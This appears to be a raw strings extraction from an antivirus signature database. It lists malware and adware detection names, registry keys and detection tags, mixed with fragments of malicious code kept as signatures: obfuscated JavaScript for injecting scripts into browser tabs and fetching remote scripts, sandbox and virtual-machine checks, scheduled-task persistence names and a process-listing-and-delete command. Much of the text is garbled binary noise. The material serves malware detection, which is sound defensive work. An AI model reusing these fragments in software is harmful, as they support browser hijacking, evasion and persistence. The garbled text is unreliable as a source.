N{ADB880A4-D8FF-11CF-9377-00AA003B7A11} microsoft.xmlhttp\\clsid N{ED8C108E-4349-11D2-91A4-00C04F7969E8} JobObjectProv.JobObjectProv FWin32_JobObject Provider Component -CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228} $FileSystem MonitoringTool:Win64/RefogKeylogger #MonitoringTool:Win64/RefogKeylogger Pz:\\Projects\\ReleaseRepository\\MonitorProject\\Delphi\\Distr\\RefogMonitor\\Mpk64.pdb FMUTEX_PROGRAMM_RUNNING:MPK64_LOADERg Mpk64.dll WM_IMHOOK_KG WM_MOUSEMOVEHOOK_KG Refog Inc GET /im/sendIM?comscoreChannel <Ymsg Command=\"6\" D[vbaY \\\\NetSpy\\\\Distr\\\\KGBSpy\\\\Mpk64\\.pdb )$\\\\NetSpy\\\\Distr\\\\KGBSpy\\\\Mpk64\\.pdb !Pirrit varpopups_uri=\"https://suggestor.pirrit.com/engine/getpopups.php Bvarpopups_uri=\"https://suggestor.pirrit.com/engine/getpopups.php 1checkAndRunPirrit() PirritDesktop PirritDesktopx` 1finishedDownloadInjectionContent(QNetwork var prtLoader function prtInIframe function prtInIframex id=\"pirrit_is_service var PIRRIT_IS_INSTALLED var PIRRIT_IS_SERVICE var PIRRIT_EXTID var pirritLoader suggestor.pirrit.com suggestor.pirrit.com~ !Dorkbot.gen!plock !Beebone.gen!H sbiedll dbghelp snxhk NSYSTEM\\ControlSet001\\Services\\Disk\\Enum *VMWARE* *QEMU* /c tasklist&&del SoftwareBundler:Win32/WbSft .exe\\sogouexplorer\\sogouexplorer.exe\\hpset.exe\\taobao\\baidu-toolbar.exe\\taobao\\info p.exe\\sogouexplorer\\sogouexplorer.exe\\hpset.exe\\taobao\\baidu-toolbar.exe\\taobao\\info taobao\\sogou_pinyin_mini !Kuluoz.D!!Kuluoz.gen!A <knock><id>%s</id> <knock><id>%s</id>] MonitoringTool:Win32/Letsurk Misleading:Win32/PromptUp BrowserModifier:Win32/Vonteera BrowserModifier:Win32/Vonteera5@* 8~Q_\\ 8~Q_\\6) :JkHZ9 ne+g {6DD1B906-45FA-4A57-9AC6-01108C25067F} AVCNoVooITPluginModule@@ $_IDispEventLocator@$00$1?DIID_DWebBrowserEvents TypeLib' = s '{3FC2D59A-5C76-1E97-30DC-1EC6784419E5}' ProgID = s 'DigiAd.DigiAd.1' ForceRemove {2ED35963-FCC9-4698-B619-787FE1C75079} = s 'DigiAd Class' script.id = \"adnetworkme_js\" addon@Vonteera.com Software\\Vonteera Safe ads SOFTWARE\\NoVooITSet \\NoVooITAddon www.acdcads.com/aff/thanks/thanks3.php?code= /output:\"sn.txt\" bios get serialnumber apsrunner/ADSKO/noodleup.exe apsrunner/ADSKO/ver.txt noodrun.exe /SC DAILY /TN \"nod01\" hjmjt.kkp ProgID = s 'adTech.adTech.1' ForceRemove {934B156A-3D17-3981-B78A-5C138F423AD6} = s 'adTech Class' www.adnetworkus.com www.adfactorytech.com var _0xec03=[\"\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x6C\\x61\\x72\\x61\\x62\\x65\\x79\\x65\\x73\\x2E\\x63\\x6F\\x6D gRandScriptUrls[_0xec03[56]+_0xe525x2b[0]][_0xec03[61]] var _0xe525x27= new XMLHttpRequest();_0xe525x27[_0xec03[50]](_0xec03[49], var _0xe525x23=localStorage[_0xec03[45]];if(!_0xe525x23||parseInt(_0xe525x23)===NaN) /Delete /tn \"mium0d\" /f function initTabNewHook(){ chrome.tabs.onCreated.addListener(function(tab){ chrome.tabs.get(tab_id, check_for_js_injection); function add_remove_script(url) return 'var Adtech_users_js gRandScriptUrls[\"ht\" + tmp[0]].push(\"ht\" + tmp[0] + \"://\" + tmp[1] + \".\" + tmp[2] + \"/\" + ((tmp[3] === \":\") ? \"\" : (tmp[3].replace(/\\:/, \"\") + \"/\")) + tmp[4] + \".js\"); console.log('Injected to', tab.url); SCRIPT:BrowserModifier:Win32/Vonteera.A-1&SCRIPT:BrowserModifier:Win32/Vonteera.A-2&SCRIPT:BrowserModifier:Win32/Vonteera.A-3&SCRIPT:BrowserModifier:Win32/Vonteera.A-4_ \\Tasks\\nod_ %\\Tasks\\nod_ \\Tasks\\nod01_ %\\Tasks\\nod01_ \\Tasks\\iBackup_ %\\Tasks\\iBackup_ \\Tasks\\SystemTask` %\\Tasks\\SystemTask` \\den` \\Twr` \\npp` #\\npp` \\Fixs` \\denc` \\benko` \\Bonzo` \\PlusN` \\Qtwin` \\VolIE` \\crown` \\miaul` \\pdfie` \\Wixer` \\sherp`\t #\\sherp`\t \\Cloud5`\t \\Popper`\t \\SoftAd`\t \\arhome`\t \\charts`\t \\rickos`\t \\AppUpd`\t \\Hoffer`\t \\AppUpd` \\Hoffer`\t&\\AppUpd` \\Flasher` \\orlando` \\CrashRep` \\Notepader` \\myNotepad` \\Convertor` #\\Convertor` \\NewNotepad` \\NoVooITAddon` &\\NoVooITAddon` \\NoVooIT\\ARhome` \\recoveredfiles` &\\NoVooIT\\ARhome` C:\\ProgramData\\npp] !Brya SoftwareBundler:Win32/Monzistall SoftwareBundler:Win32/Monzistall dynconiehkey_current_user\\software\\appdatalow\\software\\dynconie\\pricesparrow-1.4.9-instmono-win.exepricesparrow.versionhkey_current_user\\software\\ciuvo1.4.9\\plus-hd-cp1-de.exehkey_current_user\\software\\installedbrowserextensions\\plushd\\csudealply-im-bundle.exe\\csudealply-im-bundle.exenoyes52~12/181~12from=wrapper&type=wrapper&itemid=&subitemidinfo=&pubid=&cbid=&mgu=&subid=&mid=&status=12&dpc=&pbid=~&gvnd=~&mrl=&mnhr=&prmid=null&offid=52~11/181~12from=wrapper&type=wrapper&itemid=&subitemidinfo=&pubid=&cbid=&mgu=&subid=&mid=&status= !Beebone.RI !Dofoil.Z Dotdoads document.write( unescape( '%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%53%63%72%69%70%74%27%20 %68%74%74%70%3A%2F%2F%61%61%2E%64%6F%74%64%6F%2E%6E%65%74%2F%61%64%73%73c= SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\autoauto 7SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\autoauto] SoftwareBundler:MSIL/Dotdoads !Stylebot r)$g& g&13gH !GoSave j4P\" !FlashSavings \\Torch\\User Data\\Default\\Extensions\\oiigbmnaadbkfbmpbfijlflahbdbdgdf`N \\Comodo\\Dragon\\User Data\\Default\\Extensions\\oiigbmnaadbkfbmpbfijlflahbdbdgdf`N \\Google\\Chrome\\User Data\\Default\\Extensions\\oiigbmnaadbkfbmpbfijlflahbdbdgdf`R \\Chromatic Browser\\User Data\\Default\\Extensions\\oiigbmnaadbkfbmpbfijlflahbdbdgdf`R \\Google\\Chrome SxS\\User Data\\Default\\Extensions\\oiigbmnaadbkfbmpbfijlflahbdbdgdf] Rogue:Win32/Trapwot get_two? &{A14EF3FF-EB89-4FF8-B870-F058C1ABFC45} L//e:vbscript //B //NOLOGO \"AV Name\" \"{8E5CADC3-2C41-4886-B211-9C1D59EDD30F}\" $Defender PRO 2015 installation Setup DefendrvPro.exe (Malware Defender 2015 installation Setup MDefender.exe <h[Og 8x&T4 IE4ZJ gB=|g WcFMqv keILG keIw}0 GyH\tl \"Jha[ B6&9g zl5?g C8l=' uggc:// /vzt/ccp.rkr jvavarg Vagrearg PerngrCebprffN TrgGrzcCnguN x /get_two.php? RunInvalidSignatures CheckExeSignatures RunInvalidSignaturesCheckExeSignaturesnox onLoadedstopScanstartSearchbuyProduct Scan for viruses parttwo.dll parttwo.dllEntryPoint BlockedShutdownResolverSeShutdownPrivilege openProtectopenShop stopScangetAdvIdx get_two?v= @tA@@ 0DPAA QPELP q@@t0 NedTT e_z[] TdPQA BWH0 `p#X5s !#ALF:TrojanDropper:O97M/Goodabox.A!dha !#TEL:ECCert!AT !#TEL:ECCert!Ce !#TEL:ECCert!MS !#TEL:ECCert!OT !#TEL:ECCert!TH !#TEL:ECCert!VS !#//AGGR:LinkFile !#AMSI:JAMSI:RunML \t!#AMSI:JAMSI:RunML !#TEL:ECCert!DCC !#TEL:ECCert!Ent !#TEL:ECCert!GTI !#TEL:ECCert!NSL !#TEL:ECCert!eMI !#TEL:ECCert!thw !#AGGR:OpclCl.E !#TEL:Astroshell !#TEL:ECCert!AMZN !#TEL:ECCert!GTSL !#TEL:ECCert!SyTN !#TEL:ECCert!TUTN !#TEL:ECCert!eMTL !#AMSI:WMI:RunML !#Context:DataUrl !#TEL:ECCert!Certp !#TEL:ECCert!SSLCO !#//AGGR:OfficeFile !#TEL:ECCert!CMDCAL !#TEL:ECCert!GlbSig !#TEL:ECCert!HARICA !#TEL:ECCert!SETSCO !#TEL:ECCert!WoSCAL !#NotInteresting !#ALF:Lnk/Adwind.J!ibt !#SLFPER:AGGR:SamPpl.M !#AMSI:VBS:RunML !#ALF:XL4InMail.A !#SLF:SuspJavaInMail !#TEL:ECCert!OISTEFE !#AMSI:PS:RunML !#SuspLnkArchive !#AGGR:WinZip_winsfx !#SLFPER:RDPProcExec.A !#ALF:O97M/Zloader.AJ!ibtjJA !#AGGR:Redirector_exclusion !#SLF:NtdsExfil.A !#BM_NewUnsignedExe !#TEL:RansomNotes.C !#TEL:RansomNotes.D !#TEL:RansomNotes.E !#//AGGR:CMDEmbedded !#ALF:AMSI2:ML:Ps:98 !#ALF:AMSI2:ML:Ps:99 !#//SCPT:ActionSpy.BC !#TEL:ECCert!MEUSCA21 !#TEL:ECCert!MEUSCA22 !#TEL:ECCert!MEUSCA23 !#SLFPER:AGGR:SamSam.W !#AGGR:PAKFile !#AGGR:JAR_File !#AGGR:Vampa:70!ml !#ALF:JobLaunchIEURL !#BM_WhiteListRansom !#//SCPT:ActionSpy.BB !#SLFPER:AGGR:SamSam.M !#AGGR:EnumFileExeptions !#AGGR:EnumProcExeptions !#AMSI:JS:RunML !#SLF:AGGR:PU2RD.1 !#SLF:SuspOleSMail !#LnkHasEnvWithBang !#ALF:AMSI2:ML:Wmi:80 !#ALF:AMSI2:ML:Wmi:90 !#ALF:AMSI2:ML:Wmi:95 !#ALF:AMSI2:ML:Wmi:98 !#ALF:AMSI2:ML:Wmi:99 !#AGGR:MS_KWAJ_Archive !#AGGR:MS_SZDD_Archive !#ALF:AggJSInEmailO365 !#TEL:ECCert!MERCA2017 !#BM_DropperAutInjectAS !#AGGR:InjectionExeptions !#TELPER:AGGR:ADSLaunchPE !#ALF:PEembedViaXOR !#BM_DropperObscureDll !#BM_DropperObfuscatorN !#BM_DropperObfuscatorQG !#BM_DropperObfuscatorVM !#BM_DropperObfuscatorZK !#AGG:Nivdort.STRUCT !#AGGR:Rebhip_Config!A !#TEL:ECCert!MEDRCA2017 !#TEL:ECCert!MEDRCA2018 !#TEL:ECCert!MEPRCA2018 !#TEL:ECCert!METPCA2018 !#TEL:ECCert!METRCA2017 !#BM_DropperObfuscatorACP !#BM_ReverseObfuscatedScript !#ALF:AGGR:Vampa:80!ml !#ALF:AGGR:Vampa:90!ml !#ALF:AGGR:Vampa:95!ml !#ALF:AGGR:Vampa:99!ml !#BM_DropperGamarueDll !#AGGREGATOR:LowfiBanker !#//AGGR:Lua:LNKinISOFound !#TEL:AGGR:Lua:SingleJSIn7z !#TEL:AGGR:Lua:SinglePSIn7z !#AGGR:EnumAdaptersExeptions !#AGGREGATOR:MustEmulateTest !#//DocMLFile !#BM_MSHTA_LNK !#SLF:SuspLnkMail !#TEL:ECCert!MEMTPCA2018 !#TEL:ECCert!METPPCA2019 !#TEL:ECCert!METSRCA2018 !#TEL:ECCert!MSSPPCA2018 !#TEL:PsB64ExeBiggeFileSize !#//OLEHasJar 1 !#//OLEHasJar !#AGGR:WebMail !#ALF:HolCam.D !#TEL:Revocats.A !#//ALF:Malcert.B1 !#BM_PS_EncodedIEX !#AGGR:MSI_Installer !#AGGR:ImageEmbedOffice !#ALF:AGGR:Heaple:99!ml !#SLF:SuspOleNativeMail !#ALF:AGGR:Lua:SingleVBSIn7z !#TEL:AGGR:Lua:SingleBATIn7z !#TEL:AGGR:Lua:SingleCOMIn7z !#TEL:AGGR:Lua:SingleHTAIn7z !#TEL:AGGR:Lua:SingleJSEIn7z !#TEL:AGGR:Lua:SingleLNKIn7z !#TEL:AGGR:Lua:SingleVBEIn7z !#TEL:AGGR:Lua:SingleWSFIn7z !#TEL:Backdoor:PHP/Remoteshell.O 1 !#do_exhaustivehstr_rescan_dyzap_s !#BM_DropperNop2 !#AGGR:OpcCl:95!ml !#BM_DropperMiurefB !#AGGR:Miu_VB_Ancona !#AGG:Nivdort.READFILE !#AutoItIgnoreMaxSizesg !#LnkHasEnvWithPercent !#AGGR:ClnAmsiDllWriters !#AGGR:SingleJSInZIP.S001 !#AGG:Strakupa.B !#TEL:Aggr:Sense:Wget !#TEL:Aggr:Sense:PsExec !#TEL:Trojan:O97M/Inoff.B !#TEL:HSTR:Win32/Nabucur.E !#AGGR:Dha_Boron !#AGGR:Dha_Boron !#ALF:AGGR:Zheg.O !#BM_RevobfoosLnk !#//AutoitInject.BA !#Ransom:HTML/Samas!Lofi !#Context:DataControlGuid !#Context:DataReferrerUrl !#TEL:Revocats.B !!#TEL:Revocats.B !#AGG:Nivdort.AF0 !#AGG:Nivdort.AF0 !#ALF:AGGR:Dldwp.A !#SIGATTR:IrcJoinPort !#ALFPER:SCPT:Spora.A1 !#BM_UnknownFileExtension !#TEL:Trojan:VBS/Donvibs.A !#AGGR:ExcelFormulaRoutines !#ALF:AGGR:AnomalyImphashNew !#ALF:AGGR:AnomalyImphashRet !#//AGGR:AceFileLE1M !#//AGGR:ArjFileLE1M !#AGGR:LNK/StartPage !#ALF:SuspPEFileExec !#BM_PS_EMBEDDED_LNK !#ALF:AGGR:OpcCl:99!ml !#AGGR:Exploit:JS/Redkit !#BM_DropperObfuscatorRefys !#BM_DropperObfuscatorCaphaw !#do_exhaustivehstr_rescan_eorezo !#BM_OSK_EXE '!#BM_OSK_EXE !#//Import_Java $!#//Import_Java $!#AMSI:JS:RunML !#AGG:Nivdort.ABX1 !!#AGG:Nivdort.ABX1 !#ALF:HtaWithIOAV.A !#ALF:HtaWithIOAV.A !#ALF:XL4InWebMail.A !#TELPER:SCFRemoteIcon !#ALF:AMSI:Scan:VbsEncode !#TEL:PsB64ExeBiggeFileSize.ams !#AGGR:Tesch_Nth_Term_Obfuscator !#TEL:Backdoor:PHP/Remoteshell.SB !#ALF:XL4WithIOAV.A !!#ALF:XL4WithIOAV.A !#ALF:SuspXMLFileExec !#BM_MSHTAEXECUTE_LNK !#BM_HAS_DIGITALSIGNATUREg !#SLF:LNK/SuspExeF.JT!ibt !#SLF:LNK/SuspExec.JT!ibt !#ALF:PPT/HttpLinkScriptInPPT !#ALF:SuspFileInsideUser.J!ibt !#do_exhaustivehstr_rescan_torwofun_a !#LnkInRoot *!#LnkInRoot !#//RarSfxSilent %!#//RarSfxSilent !#BM_DropperNop1 %!#BM_DropperNop1 3333333J !#//NSIS_Installer #!#//NSIS_Installer !#ALF:AGGR:EroMal1 #!#ALF:AGGR:EroMal1 !#ALF:AGGR:EroMal2 #!#ALF:AGGR:EroMal2 !#TEL:HTML/Phish.I #!#TEL:HTML/Phish.I !#AllowList:MpSigStub !#AllowList:MpSigStub !#AGGR:ExcelSiorType.C !#ALF:SuspPDFWebmail.C !#SLF:AGGR:Lua:VbChain.A !#SLF:LNK/SuspExecA.JT!ibt !#TEL:Trojan:Win32/Dender.F !#AGGR:FileNameSuspicious.A1 !#BM_DropperBlob:Win32/UpatreD !#SLF:AGGR:PEembededViaXor.S001 !#ALF:XL4InMail.B %!#ALF:XL4InMail.B !#BM_PSHIDDEN_LNK %!#BM_PSHIDDEN_LNK !#AGG:Nivdort.SYNC $!#AGG:Nivdort.SYNC !#ALF:AGGR:Bampa:70!ml !#ALF:AGGR:Bampa:70!ml !#ALF:AGGR:Bampa:80!ml !#ALF:AGGR:Bampa:80!ml !#ALF:AGGR:Bampa:90!ml !#ALF:AGGR:Bampa:90!ml !#ALF:AGGR:Bampa:95!ml !#ALF:AGGR:Bampa:95!ml !#ALF:AGGR:Bampa:99!ml !#ALF:AGGR:Bampa:99!ml !#ALFPER:AGG:Igaayela.A !#ALF:ShellCodeInB64withXOR !#SLF:ContextualEnvironment !#TEL:Backdoor:JS/CMDFromWMI !#ExceptionExt )!#ExceptionExt !#SIGATTR:Keylog '!#SIGATTR:Keylog !#FOP:Deep_Analysisj $!#FOP:Deep_Analysisj !#AGG:AutoItTrayHide #!#AGG:AutoItTrayHide !#ALF:DumpADCreds.J!ibt !#ALF:DumpADCreds.J!ibt !#BM_DropperObfuscatorUR !#//AGGR:SuspWin32APInCMD !#ALF:Cert_12E7-3064-6112 !#ALF:Cert_7AB5-2DF2-DA3F !#SLF:AGGR:Lua:MshtaLnk.A !#ALF:AGGR:Java/Adwind.F!eml !#ALF:HMValidateHandleCalledD !#ALF:AGGR:SuspiciousFileNamePe !#ATTR:Lua:FlashInPdfMoreThan_2 !#ATTR:Lua:FlashInPdfMoreThan_3 !#ATTR:Lua:FlashInPdfMoreThan_5 !#SLFPER:MultiFileTypeTrick.A!rsm !#BM_PSENCODED_LNK &!#BM_PSENCODED_LNK !#AGGR:IEV_RES_TRICK $!#AGGR:IEV_RES_TRICK !#ALF:Win32/Pdfshell.A \"!#ALF:Win32/Pdfshell.A !#ALF:AMSI:Excel4:Exec.A !#ALF:AMSI:Excel4:Exec.A !#TEL:Python/Meterpreter !#TEL:Python/Meterpreter !#AGGR:Exploit:JS/ExpKitRef !#ALF:Win32/PWE.Linsuavev.H !#LnkHasEnvWithPercentColon !#TEL:Trojan:Win32/Coydif.A t;cCf t;cCf t>/S t?9k t?^9su t?^9su 3\":RP t@I( 6`;?*YL tH`bg tH`bg tIgv(/H tIgv(/H ~CNemC/ l004\"#9W \",EG|v$7^s8 tMJ4gy( tMJ4gy( tMp* A,24a rqP#I@& e8Mz!* tV]{N tV]{N tWda Wc-6vv t_HMu t_HMu Yt:Q\t tc-c D$1#Y9 Ozw{J tl 'a tl 'a `%ge& ^0`s\\ tqLZ>$ S]eY< ,)XSc% tx<!; tx<!; ]`\\Uj t{D_ 4z|\"9-sR |r=dX 9jxY0?g ]#m(gH FRn*y n`3D=z %cH\\r y&*+R*O T=w,cb eq5cl\\Y 3Qd^\" =Qt/a ,CERR -Yy`-m +\"wa] (,]yy` pL{Y% }\tBTFH AxoW^ !#$iX KPh/4 ZLct j}\"DO Ocwz 2j \"\t4n[_ \tGk[! vWN%:1 (e2=O *}= n U5T_g b @P7{ X:T6&A BYz%i dY\t&K WNN<n {ku r NlW>A 4frdL QL]JF {6JM]J<^j; sqAA/ {*:V2 85aBsCAM> 7>7lp oxc3W (! cW Sezgz zm.\"<X XDbagg E>)2)) YTBba ZfM7B Jpx|& ]{qR: &R*;r E&qU^ j~^5n !sgy' Y}aEn8FJ \tO1O? qH4hH pIk`w haa\"Ne 5_l' ^qF+o OcNYf _:`G[ FXSJ{e j8N Nx I|;R+ SZ\t*y,e B:dsD@6 oM(xPy '9vq_ tlb17 (3(.<B xyhi0 &~-ty ?sTD<f :\t8}. Z}G a TW[R$n >\\rbx} lbI C yuo-K+ `5p\\2 L^=kd :L.X <+yRs gyi|H WHd+X (s+FG pc?1S d\t ~C r:jJh Xk>K] rtER\")4 iVPS4 W?Fn\t b n k `jT'1 vO]q:Q p,Wm1[ SXr]_ e9N\", ZCcyVt[B WmySu\\Q xM3.D D+}\"/l, dQjyA2r1 } =bAB h :$IS jv\"(oV Z;.tPqs g\"kz( @g&T` : B : j! BXQ Y{ bkC~W }StA&, TVU5M' :!l2i :!l2i lsPRF :#pO :&aX :(r, :)cE :+ng ;>7k( RY eX -de6Hqh :0@\t 55wXi }Ejb< :38h CTqJ5 :5/\t :6!'&rt :6!'&rt :9{ :9}H\t :9}H\t ;G*ci, f]l3< :C]Ae :C]Ae :C`\\K} :C`\\K} I_xU\" :Dd]v<k :Dd]v<k gTC)#3 QUFX@c ]u5*R \tsCFy;_ :M5! :NU]V :NU]V Gi8NCy :Oq+k> :Oq+k> tn1#F SXWGU :PUH :Q\\d XStPn 3C53v C`<M1$ :aj2 ?Uk8W\\1 nCW?! 2D4]- >-.{ z1 :dJgA>92T4 :dJgA>92T4 7~;hmc8 :e\\> :kHY\\ :kHY\\ u! >ix :m/T :m?% :j}UZ :qEQ :u`Q 8An1 5hZ :vtBj9 :vtBj9 cP3Z0tnT ?|+1H l;`mEDz2 mZtB e|PW! `lSx3\"] |`TNB q<re> S<\t@* IrfDs \"IZ<X ULjr0 #MNrMvP {:<<e OLEq9J o2Yr! gzWdz ha ). hAQ$ NjJ )l+ p_qPB bP\\FV ~.r=r xm5Yu .exe,0 ClientCaps.ClientCaps.1 \"ClientCaps Class SOFTWARE\\Microsoft\\WAB\\DLLPath wab32.dll SOFTWARE\\Classes\\.tiff $TIFImage.Document (SOFTWARE\\Classes\\.dbg\\PersistentHandler (SOFTWARE\\Classes\\.dot\\PersistentHandler (SOFTWARE\\Classes\\.exp\\PersistentHandler (SOFTWARE\\Classes\\.imc\\PersistentHandler (SOFTWARE\\Classes\\.wll\\PersistentHandler (SOFTWARE\\Classes\\Applications\\cchat.exe (SOFTWARE\\Classes\\Applications\\msimn.exe (SOFTWARE\\Classes\\htmlfile\\shell\\printto (SYSTEM\\CurrentControlSet\\Services\\IPNAT (SYSTEM\\CurrentControlSet\\Services\\modem (SYSTEM\\CurrentControlSet\\Services\\mspqm (SYSTEM\\CurrentControlSet\\services\\atapi (SYSTEM\\CurrentControlSet\\services\\rdbss (SYSTEM\\controlset001\\Services\\acpi\\enum (software\\classes\\wmisnapinabout.1\\clsid (system\\controlset001\\control\\nls\\locale (system\\currentcontrolset\\services\\iris5 CDO.DropDirectory 0CDO DropDirectory class BMPFilter.CoBMPFilter.1 $CoBMPFilter Class ^)fRecordingTerminal.FileRecordingTerminal )Control Panel\\Accessibility\\Blind Access HARDWARE\\DEVICEMAP\\VIDEO MaxObjectNumber )SOFTWARE\\Classes\\Applications\\finder.exe )SOFTWARE\\Classes\\Applications\\themes.exe )SYSTEM\\ControlSet001\\Services\\DcomLaunch )SYSTEM\\CurrentControlSet\\Control\\Pnp\\Pci )SYSTEM\\CurrentControlSet\\Services\\CmBatt )SYSTEM\\CurrentControlSet\\Services\\hidusb )SYSTEM\\CurrentControlSet\\Services\\isapnp )SYSTEM\\CurrentControlSet\\Services\\mouhid )SYSTEM\\CurrentControlSet\\Services\\trkwks )SYSTEM\\CurrentControlSet\\Services\\wanarp )SYSTEM\\CurrentControlSet\\services\\PCIIde )SYSTEM\\CurrentControlSet\\services\\Pcmcia )SYSTEM\\CurrentControlSet\\services\\mrxsmb )SYSTEM\\CurrentControlSet\\services\\rasacd )SYSTEM\\controlset001\\services\\rpclocator )Software\\Classes\\Wscript.network.1\\clsid )software\\classes\\javascript1.2\\olescript )software\\classes\\javascript1.3\\olescript )software\\classes\\wmicntl.wmisnapin\\clsid CDO.Configuration.1 .CDOConfiguration Class Microsoft.DiskQuota.1 *Microsoft Disk Quota ias.basecamphost\\curver &IAS.BaseCampHost.1 !Software\\ODBC\\ODBC.INI\\Interbase driverdll $Control Panel\\Accessibility\\TimeOut SOFTWARE\\Classes\\.sst *CertificateStoreFile SymbolicLinkValue )software\\classes\\http\\shell\\open\\command *SOFTWARE\\Classes\\Applications\\cdfview.dll *SOFTWARE\\Classes\\Applications\\cmmgr32.exe *SOFTWARE\\Classes\\Applications\\depends.exe *SOFTWARE\\Classes\\Applications\\dsquery.dll *SOFTWARE\\Classes\\Applications\\inetcpl.cpl *SOFTWARE\\Classes\\Applications\\mspaint.exe *SOFTWARE\\Classes\\Applications\\shdocvw.dll *SOFTWARE\\Classes\\Applications\\shell32.dll *SOFTWARE\\Classes\\Applications\\shscrap.dll *SOFTWARE\\Classes\\Applications\\wltmime.exe *SOFTWARE\\Classes\\Applications\\wscript.exe *SOFTWARE\\Classes\\Applications\\zipfldr.dll *SYSTEM\\ControlSet001\\Services\\Disk\\Enum\\0 *SYSTEM\\ControlSet001\\services\\hidusb\\enum *SYSTEM\\ControlSet001\\services\\policyagent *SYSTEM\\ControlSet001\\services\\usbhub\\enum *SYSTEM\\CurrentControlSet\\Control\\Arbiters *SYSTEM\\CurrentControlSet\\Control\\hivelist *SYSTEM\\CurrentControlSet\\Services\\appmgmt *SYSTEM\\CurrentControlSet\\Services\\tapisrv *SYSTEM\\CurrentControlSet\\control\\usbflags *SYSTEM\\CurrentControlSet\\services\\lmhosts *SYSTEM\\CurrentControlSet\\services\\ndproxy *SYSTEM\\CurrentControlSet\\services\\rasl2tp *Software\\policies\\microsoft\\windows\\ipsec *software\\classes\\wmicntl.wmisnapin\\curver *system\\currentcontrolset\\services\\mskssrv *system\\currentcontrolset\\services\\netctrl *system\\currentcontrolset\\services\\sbiedrv *system\\currentcontrolset\\services\\sdbgmsg Content Type6application/x-x509-ca-cert HHCtrl.FileFinder b\"mime\\database\\charset\\_autodetect \tcodepage SOFTWARE\\Classes\\.xsl ,VisualStudio.xsl.10.0 'system\\currentcontrolset\\services\\bits +SOFTWARE\\Classes\\Applications\\faxcover.exe +SOFTWARE\\Classes\\Applications\\kodakprv.exe +SOFTWARE\\Classes\\Applications\\winhlp32.exe +SOFTWARE\\Microsoft\\NET Framework Setup\\NDP +SYSTEM\\ControlSet001\\Services\\Dhcp\\Linkage +SYSTEM\\ControlSet001\\Services\\lanmanserver +SYSTEM\\CurrentControlSet\\Enum\\ACPI\\PNP0303 +SYSTEM\\CurrentControlSet\\Services\\Compbatt +SYSTEM\\CurrentControlSet\\Services\\Kbdclass +SYSTEM\\CurrentControlSet\\Services\\PerfDisk +SYSTEM\\CurrentControlSet\\Services\\flpydisk +SYSTEM\\CurrentControlSet\\control\\lsa\\skew1 +SYSTEM\\CurrentControlSet\\services\\inetaccs +SYSTEM\\CurrentControlSet\\services\\ndistapi +SYSTEM\\CurrentControlSet\\services\\plugplay +SYSTEM\\CurrentControlSet\\services\\seclogon +SYSTEM\\controlset001\\services\\npfs\\aliases +software\\classes\\msdasc\\shell\\open\\command +system\\currentcontrolset\\services\\23333333 +system\\currentcontrolset\\services\\mspclock +system\\currentcontrolset\\services\\vqswoftf ADODB.ErrorLookup 6ADODB Error Lookup Service Microsoft.Update.Session (UpdateSession Class Scripting.FileSystemObject $FileSystem Object CertificateAuthority.Config \"CertConfig Class d#mime\\database\\charset\\windows-1250 d#mime\\database\\charset\\windows-1251 d#mime\\database\\charset\\windows-1252 d#mime\\database\\charset\\windows-1253 )control panel\\accessibility\\blind access software\\microsoft\\dataaccess full21install ,SYSTEM\\CurrentControlSet\\Control\\StillImage ,SYSTEM\\CurrentControlSet\\Enum\\Root\\ACPI_HAL ,SYSTEM\\CurrentControlSet\\services\\acpi\\enum ,SYSTEM\\CurrentControlSet\\services\\msiserver ,Software\\microsoft\\active setup\\mimefeature ,software\\Microsoft\\internet explorer\\styles ,software\\classes\\txtfile\\shell\\open\\command ,software\\classes\\xslfile\\shell\\open\\command ,system\\controlset001\\control\\productoptions ,system\\currentcontrolset\\services\\netddesvc ,system\\currentcontrolset\\services\\vboxguest ,system\\currentcontrolset\\services\\winhelp32 f-AppID\\{000C101C-0000-0000-C000-000000000046} f-CLSID\\{00000104-0000-0010-8000-00AA006D2EA4} f-CLSID\\{00000315-0000-0000-C000-000000000046} f-CLSID\\{000C1094-0000-0000-C000-000000000046} f-CLSID\\{ecabafc3-7f19-11d2-978e-0000f8757e2a} f-certificate_wab_auto_file\\shell\\open\\command !software\\d\\ctpkontrolle\\settings -SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion 'SYSTEM\\CurrentControlSet\\Services\\Dhcp -SOFTWARE\\Classes\\exefile\\shellex\\drophandler -SOFTWARE\\Microsoft\\Active Setup\\ClsidFeature -SYSTEM\\ControlSet001\\services\\ipfilterdriver -SYSTEM\\CurrentControlSet\\Enum\\STORAGE\\Volume -SYSTEM\\CurrentControlSet\\Services\\Cdrom\\Enum -Software\\Classes\\VBSfile\\shell\\open2\\command -Software\\microsoft\\directinput\\compatibility -software\\classes\\cdo.ss_nntponpostsink\\clsid -software\\classes\\vbsfile\\shellex\\drophandler -software\\classes\\wordpad.document.1\\protocol -system\\controlset001\\control\\prioritycontrol -system\\currentcontrolset\\services\\parameters ias.policyenforcer\\curver *IAS.PolicyEnforcer.1 CertificateAuthority.Request $CertRequest Class internetexplorer.application $Internet Explorer h%mime\\database\\charset\\_autodetect_kr .SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run software\\microsoft\\directx 4.09.00.0904 &SOFTWARE\\Tencent\\PlatForm_TYPE_LIST\\3 \tTypePath .SOFTWARE\\Classes\\Directory\\Background\\shellex .SOFTWARE\\Microsoft\\Windows\\C ([^\\%.]+)$ Lua:Context/NonPeFileInStartUpFolder.A! (Lua:Context/NonPeFileInStartUpFolder.A! !#Lua:TrojanDropper:VBS/Micwix!Crypt1 !#Lua:TrojanDropper:VBS/Micwix!Crypt1IncludesConversionToBinary_fastDec2BinObMpAttributes = \".-39 %d[%D]-\"%s (%d+)[%D]+ [Micwix] \t[Micwix] !#PEPCODE:TrojanDropper:Win32/Small.RZ @DW@C Chanitor Trojan:Win32/Chanitor ^winlogin$ \\windows\\winlogin.exe$ 71614cc91c6c 2e29c0f8f131 2e29c0f8f131IncludesResearchData readheader readfooter \"\"\" | base64 [Base64Enc] //SCPT:Base64.Encoded !#Lua:Ransom:Win32/Tescrypt!recfile recover_file recovery_file restore_file how_recover !#PEPCODE:TrojanDropper:Win32/Pukish.A 25b3b7e60ef3 